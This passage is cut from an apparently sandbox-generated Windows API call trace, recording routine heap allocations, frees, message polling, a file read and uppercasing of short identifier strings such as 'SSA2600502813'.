lpBuffer=0x2aaf410, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0113.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0113.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.188] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0113.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0113.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13dfb) returned 0x2a7a130 [0113.189] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cbc020 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0113.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0113.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0113.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13dfb) returned 0x2a8df38 [0113.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0113.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0113.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0113.193] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13dfb) returned 0x2a7a130 [0113.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0113.193] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0113.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0113.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0113.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0113.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0113.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0113.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0113.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0113.195] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0113.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0113.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0113.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13dfb) returned 0x2a7a130 [0113.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0113.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0113.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fd0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0113.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0113.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13dfb) returned 0x37c0048 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0113.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0113.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0113.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0113.200] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0113.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0113.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0113.200] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.201] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0113.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0113.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0113.204] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa078 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0113.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0113.204] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0113.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0113.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0113.204] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, 